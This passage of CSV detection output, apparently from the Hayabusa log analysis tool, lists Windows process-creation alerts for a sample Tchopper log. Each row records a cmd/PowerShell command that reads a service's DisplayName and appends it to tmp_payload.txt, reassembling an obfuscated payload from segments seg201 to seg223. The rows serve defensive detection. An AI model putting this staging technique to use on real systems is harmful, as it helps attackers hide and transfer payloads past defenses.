0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:51.855 